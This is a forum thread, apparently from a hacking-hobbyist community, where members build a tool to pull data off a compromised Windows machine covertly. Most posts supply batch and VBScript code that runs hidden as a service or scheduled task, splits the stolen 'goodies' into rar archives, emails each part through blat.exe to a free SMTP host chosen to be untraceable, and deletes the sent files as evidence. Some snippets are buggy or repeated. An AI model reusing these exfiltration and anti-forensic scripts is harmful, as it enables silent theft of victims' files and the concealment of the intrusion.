Getting data off a an owned machine

[Guest]

I wouldnt use a bat script to do this, as its going to be hard to actually hide the bat scripts window. Any user is going to notice a window pop up and close. Does it have to send all that data at once though? I mean cant you split all the data into very small junks and every 30mins or so send one chunk.

[pseudobreed]

It almost sounds like a custom rootkit. Nice.

srvany is the application that can turns a batch command into a service. Really easy to setup and I use it all the time. You just have to make sure that all registry settings and application info go into the 'All Users' profiles.

I could never get Blat to auth with Gmail. Gmail kept spitting an error back to me that I had to login a certain way (I cant remember the exact error off the top of my head). It doesnt accept the auth command that Blat gives off.

So, I just signed up with a free smtp host (inbox.com). It works out because if the user fires up ethereal and see where the emails are going it really can not be traced back to me.

Im going to look into what it takes to setup a bare bones SMTP server.

@Spider

If you setup a batch schedule with the at command the batch runs under the system account and therefor runs silently. The user never sees the console window. The same thing works if you use srvany to make a service or you could always call nircmd execcmd.

[Darren Kitchen]

ok so blat doesnt work with gmail smtp out of the box. it doesnt handle ssl correctly. supposedly stunnel can be used to wrap it correctly. im looking for some info on that now.

also turns out that EXACTLY what we need has already been written at: http://weblogs.asp.net/nleghari/articles/gmailbackup.aspx

*however*, it requires dot net framework 2.0, and it adds an icon to the systray. bummer! could have been perfect.

[pseudobreed]

Im not 100% sure what you are trying to do, however, you could check out Sourceforge for some inspiration. Maybe you can find what you are looking for and port the code.

[SomeoneE1se]

somewhere on this forum someone kept saying somthing about renaming the bat to somthing like .cmd or command or somthing thats starts with a C and reminds me of the work command and if you do NO window will come up

I remember hearing of this twice but I can't seem to find it anymore

[Ebola Eater of Packets]

Couldn't you just initialize the window in the bottom pixel of the screen?

[Darren Kitchen]

got it working so that once the right paramaters are met the data retrieval will begin and invisibly run the batch file. that's part 1. ive got the tools and commands to send email attachments via command line. that's part 3. now part 2 is rar'ing the files for delivery. shouldnt be long now.

[Darren Kitchen]

ok i've got everything working now except for one last thing. (i say that now but once the proof of concept is done you know feature creep will set in). anyway, here's the problem and I'm sure it's something that could be done with a simple loop in batch. i'd R the FM but im crashing hard after not sleeping for a few days so i'll be lazy and ask.

here's the deal: the hack is done. the goodies have been retreived. then rar'd for size. to keep things simple we're using email with ssl which means attachment size needs to be low. if the goodies are less than 5 MB it's no issue, a single rar file will do the trick. but if we've got say, three 5 mb rar files to email we'll need a loop.

Here's what we've got:

goodies.r00

goodies.r01

goodies.r02

and we need to do this to each file:

blat.exe <filename> -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

I'm absolutely exhausted. I'm going to crash and pick this back up in the morning. If anyone has a potential solution or suggestion let me know.

Oh, and thanks for everyones input and help on this project. i wont forget your names when doing the segment this weekend.

[cooper]

Blat is being run from within a batch script, yes?

Doesn't Windows batch script support loops aswell?

[boristsr]

i think the problem is more, we don't know how many files it will be split into.

a possible solution: the windows scripting host provides some rather powerful libraries. is this an acceptable requirement?

[cooper]

Can't you loop over the output of something like '<my_fileset>.*'?

Savages!

Maybe you can compile a second script from the first script which has that listing added into it?

[SomeoneE1se]

This is just a simple batch script

it's been a long time but its somthing like

IF EXIST pwned.r00 GOTO hak1 

ELSE GOTO END

:hak1

pwn box more send e-mail 2   (replace with script to send e-mail I have no clue about those commands)

IF EXIST pwned.r02 GOTO hak2 

ELSE GOTO END

:hak2

pwn box more (same)

IF EXIST pwned.r03 GOTO hak3

ELSE GOTO end

...

more haking code

...

:end

REM THIS BOX HAS BEEN PWNED BY HAK5.ORG

someone should check that (that should be right but i'm tired and batch programming was a long time ago) and finish it up to about r45 (45 for h4k5 I can't help but leave easter eggs in my code even if it's a script kiddie egg)

and you may not want to add that last REMark

[boristsr]

that code is good except you either need to have a huge batch-script just in case, or there is a large chance you could miss some files. it'd be good if we could iterate over a list as suggested above, however my batch script ability isn't very strong, so i have no idea if it's feasible in a batch.

[SomeoneE1se]

Take a look at fastpush all that is, is just a batch script.... or anyother program.. the idea would be to chose the language to fit the program requirements here we need to pass commands to the windows command line... useing a batch script would be the best/fastest way... if not the simplest or smallest code.... it works thats all we need.

and this way theres nothing else trying to hide on the computer...

[boristsr]

just had a great idea, modified your code a bit and used something i gleaned from a script in the switchblade thread

@echo off

::initial variable values

SET fileNum=00

SET filename="pwned.r"



::make a string containing the complete filename

SET filenameComplete=%filename%%fileNum%

::check to see if the initial file exists, if not, jumps to after the loop

IF NOT EXIST %filenameComplete% GOTO noFiles



::the archive loop

:processFile

::do what we need with it here



::perform steps in preparation for next file

::increment the file number

SET /a fileNum=fileNum+1

::make the number double digits

if %fileNum% LSS 10 set fileNum=0%fileNum%

::make a string containing the complete filename

SET filenameComplete=%filename%%fileNum%



::check to see if next file exists and then loop

::else continue on

IF EXIST %filenameComplete% GOTO processFile



:noFiles

::Continue the script

how valid is that? remember, my batch scripting skills suck.

**edit** commented it better. have since tested it, it works, except it executes on the first file reguardless, so fixed that too.

**edit 2** somewhere in my refinements, i have broken it. will have a working version very soon

**edit 3** working again, placed a not on the wrong if statement

[PoyBoy]

batch scripts really seem to look like a pile of shit on a griddle compared to python...

Anyways, I think is really going to work!

[404]

I'm really looking forward to how this project will turn out.

Maybe a bit late, but here's an interesting C script for keylogging and mailing from Irongeek: http://www.irongeek.com/i.php?page=security/keylogger . Probably not useful for this project anymore, but still interesting.

Oh by the way, which C compiler did you use now, Darren?

[boristsr]

batch scripts really seem to look like a pile of shit on a griddle compared to python...

Anyways, I think is really going to work!

while i don't disagree, batch scripts do have the advantage of not needing a 10 meg download.

[pseudobreed]

Copy and paste the code into goodies.vbs

Call the VBScript on the command line:

cscript /nologo goodies.vbs {filename*}

It will blat out all the files that match the filename*. Use * as the wildcard. (ie. cscript /nologo goodies.vbs goodies* - This will send out every file in the folder that matches goodies.*, goodies.rar, goodies.r01, goodies.r02, etc.)

Set FSO = CreateObject("Scripting.FileSystemObject")



ReDim arrFiles(1)

Set Folder = FSO.GetFolder(".")

Set Files = Folder.Files



For Each File in Files

  If CheckFile(File.Name, WSCript.Arguments(0)) Then

    If i > UBound(arrFiles) Then Redim Preserve arrFiles(i*2)

    arrFiles(i) = File.Path

    i = i + 1

  End If

Next

ReDim Preserve arrFiles(i-1)



For Each FileName In arrFiles

  'WScript.Echo FileName

  blat.exe FileName -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

Next



Private Function CheckFile (ByVal Name, ByVal Filter)

  CheckFile = False

  FilterPos = 1

  NamePos = 1



  Do

    If FilterPos > Len(Filter) Then 

      CheckFile = NamePos > len(Name)

      Exit Function

    End If



    If Mid(Filter,FilterPos) = ".*" Then

      If NamePos > Len(Name) Then CheckFile = True

      Exit Function

    End If



    If Mid(Filter,FilterPos) = "." Then

      CheckFile = NamePos > Len(Name)

      Exit Function

    End If



    FilterCount = Mid(Filter,FilterPos,1)

    FilterPos = FilterPos + 1



    Select Case FilterCount

      Case "*"

        CheckFile = CheckFile2(Name,NamePos,Filter,FilterPos)

        Exit Function

      Case "?"

        If NamePos <= Len(Name) And Mid(Name,NamePos,1) <> "." Then NamePos = NamePos + 1

      Case Else

        If NamePos > Len(Name) Then Exit Function

        NameCount = Mid(Name,NamePos,1)

        NamePos = NamePos + 1

        If Strcomp(FilterCount,NameCount,vbTextCompare) <> 0 Then Exit Function

    End Select

  Loop

End Function



Private Function CheckFile2 (ByVal Name, ByVal NamePos0, ByVal Filter, ByVal FilterPos0)

  FilterPos = FilterPos0



  Do

    If FilterPos > Len(Filter) Then

      CheckFile2 = True

      Exit Function

    End If



    FilterCount2 = Mid(Filter,FilterPos,1)

    FilterPos = FilterPos + 1    

    

    If FilterCount2 <> "*" And FilterCount2 <> "?" Then

      Exit Do

    End If

  Loop



  If FilterCount2 = "." Then

    If Mid(Filter,FilterPos) = "*" Then

      CheckFile2 = True

      Exit Function

    End If

    

    If FilterPos > Len(Filter) Then

      CheckFile2 = InStr(NamePos0,Name,".") = 0

      Exit Function

    End If

  End If



  For NamePos = NamePos0 To Len(Name)

    NameCount = Mid(Name,NamePos,1)



    If StrComp(FilterCount2,NameCount,vbTextCompare)=0 Then

      If CheckFile(Mid(Name,NamePos+1),Mid(Filter,FilterPos)) Then

        CheckFile2 = True

        Exit Function

      End If

    End If

  Next

  

  CheckFile2 = False

End Function

I didnt comment anything =/, so if you have any questions just ask and Ill explain.

Now you just have to fill in the credentials for blat and you should be good to go.

*Edit - Added argument option to script.

[DLSS]

This is just a simple batch script

it's been a long time but its somthing like

IF EXIST pwned.r00 GOTO hak1 

ELSE GOTO END

:hak1

pwn box more send e-mail 2   (replace with script to send e-mail I have no clue about those commands)

IF EXIST pwned.r02 GOTO hak2 

ELSE GOTO END

:hak2

pwn box more (same)

IF EXIST pwned.r03 GOTO hak3

ELSE GOTO end

...

more haking code

...

:end

REM THIS BOX HAS BEEN PWNED BY HAK5.ORG

someone should check that (that should be right but i'm tired and batch programming was a long time ago) and finish it up to about r45 (45 for h4k5 I can't help but leave easter eggs in my code even if it's a script kiddie egg)

and you may not want to add that last REMark

ok so as cooper sayd 2ce u can loop in the batch script so instead of

creating a new line each time

make the number a variable (r.%part%)and at the end

make it add part = part+1

and at ure line wich looks if it exists make it so when it doesn't exit stop.

this method reduces (if u'dve gon with 45)a estimated +120 lines to a estimated 11 to 25 line's (depending wot ure still going to add in)

this for example shud work ...

IF EXIST pwned.r00 GOTO send

ELSE GOTO END



:hak1

set /a part=%part%+1

IF EXIST pwned.r%part% goto send

else goto end



:send

blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

del pwned.r%part% (delete the evidence after sending)

goto hak1



:end

exit

[SomeoneE1se]

Ok so I finshed my code I didn't go to 45 but sending 20 files should be enough and i also preped boristsr code but I have NO idea if it will work

@ECHO OFF

IF EXIST goodies.r00 GOTO hak0

ELSE GOTO end

:hak0

blat.exe goodies.r00 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r01 GOTO hak1

ELSE GOTO end

:hak1

blat.exe goodies.r01 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r02 GOTO hak2

ELSE GOTO end

:hak2

blat.exe goodies.r02 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r03 GOTO hak3 

ELSE GOTO end

:hak3

blat.exe goodies.r03 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r04 GOTO hak4

ELSE GOTO end

:hak4

blat.exe goodies.r04 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r05 GOTO hak5

ELSE GOTO end

:hak5

blat.exe goodies.r05 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r06 GOTO hak6

ELSE GOTO end

:hak6

blat.exe goodies.r06 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r07 GOTO hak7

ELSE GOTO end

:hak7

blat.exe goodies.r07 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r08 GOTO hak8

ELSE GOTO end

:hak8

blat.exe goodies.r08 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r09 GOTO hak9

ELSE GOTO end

:hak9

blat.exe goodies.r09 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r10 GOTO hak10

ELSE GOTO end

:hak10

blat.exe goodies.r10 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r11 GOTO hak11

ELSE GOTO end

:hak11

blat.exe goodies.r11 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r12 GOTO hak12

ELSE GOTO end

:hak12

blat.exe goodies.r12 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r13 GOTO hak13

ELSE GOTO end

:hak13

blat.exe goodies.r13 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r14 GOTO hak14

ELSE GOTO end

:hak14

blat.exe goodies.r14 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r15 GOTO hak15

ELSE GOTO end

:hak15

blat.exe goodies.r15 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r16 GOTO hak16

ELSE GOTO end

:hak16

blat.exe goodies.r16 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r17 GOTO hak17

ELSE GOTO end

:hak17

blat.exe goodies.r17 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r18 GOTO hak18

ELSE GOTO end

:hak18

blat.exe goodies.r18 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

IF EXIST goodies.r19 GOTO hakover 

ELSE GOTO end

:hakover

blat.exe goodies.r19 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

:end

exit

if you expect to have to send more then 20 files let me know and i'll update the code for more files

and again I have noidea if this will work

@echo off

SET rarNum=00

SET rar="goodies.r"

SET rarfile=%rar%%rarNum%

IF NOT EXIST %rarfile% GOTO end



:hakit

blat.exe %rarfile% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099



::increment the file number

SET /a rarNum=rarNum+1

IF %rarNum% LSS 10 set rarNum=0%fileNum%

SET rarfile=%rar%%rarNum%



::check to see if next file exists and then loop

::else continue on

IF EXIST %rarfile% GOTO hakit



:end

exit

[PoyBoy]

Nice work. I *really* cant wait to see the episode that this is on!

[DLSS]

arg !!!

are you ignoring my last post ?

this will work : in less lines :

IF EXIST pwned.r00 GOTO send

ELSE GOTO END



:hak1

set /a part=%part%+1

IF EXIST pwned.r%part% goto send

else goto end



:send

blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

del pwned.r%part% (delete the evidence after sending)

goto hak1



:end

exit

[pseudobreed]

arg !!!

are you ignoring my last post ?

this will work : in less lines :

IF EXIST pwned.r00 GOTO send

ELSE GOTO END



:hak1

set /a part=%part%+1

IF EXIST pwned.r%part% goto send

else goto end



:send

blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

del pwned.r%part% (delete the evidence after sending)

goto hak1



:end

exit

If you do decide to use this, you need to make some changes. WinRar splits files either by adding part# to the filename or creates a new file extention such as .r01, .r02, .r03, etc. depending on how the user wants to split files. Usually it's the latter. In either case it will always have a .rar extension for the first file.

So, in your code, you need to send the first .rar file, then go into your loop. Also, while in your loop you need to add a 0 to the file extension if the file number is below 10. Im not sure what happens if you go into three digits, never had to split of a file into that many chunks.

[DLSS]

arg !!!

are you ignoring my last post ?

this will work : in less lines :

IF EXIST pwned.r00 GOTO send

ELSE GOTO END



:hak1

set /a part=%part%+1

IF EXIST pwned.r%part% goto send

else goto end



:send

blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

del pwned.r%part% (delete the evidence after sending)

goto hak1



:end

exit

If you do decide to use this, you need to make some changes. WinRar splits files either by adding part# to the filename or creates a new file extention such as .r01, .r02, .r03, etc. depending on how the user wants to split files. Usually it's the latter. In either case it will always have a .rar extension for the first file.

So, in your code, you need to send the first .rar file, then go into your loop. Also, while in your loop you need to add a 0 to the file extension if the file number is below 10. Im not sure what happens if you go into three digits, never had to split of a file into that many chunks.

thnx 4 the pointers fixed it to work now (but bummer to the amount of line's)

IF EXIST pwned.rar GOTO 5end1

IF EXIST pwned.r00 GOTO 5end1

ELSE GOTO END



:hak1

set /a part=%part%+1

IF %part% lss 10

goto less10

else goto more10



:less10

IF EXIST pwned.r0%part% goto sendless10

else goto end

:more10

IF EXIST pwned.r%part% goto send

else goto end



:5end1

blat.exe pwned.rar -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

del pwned.rar (delete the evidence after sending)

goto hak1



:sendless10

blat.exe pwned.r0%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

del pwned.r%part% (delete the evidence after sending)

goto hak1



:send

blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

del pwned.r%part% (delete the evidence after sending)

goto hak1



:end

exit

@ this point gmullens las small bit would prolly b better as its les line's of code ....

(tho i dont kno the issue's ....)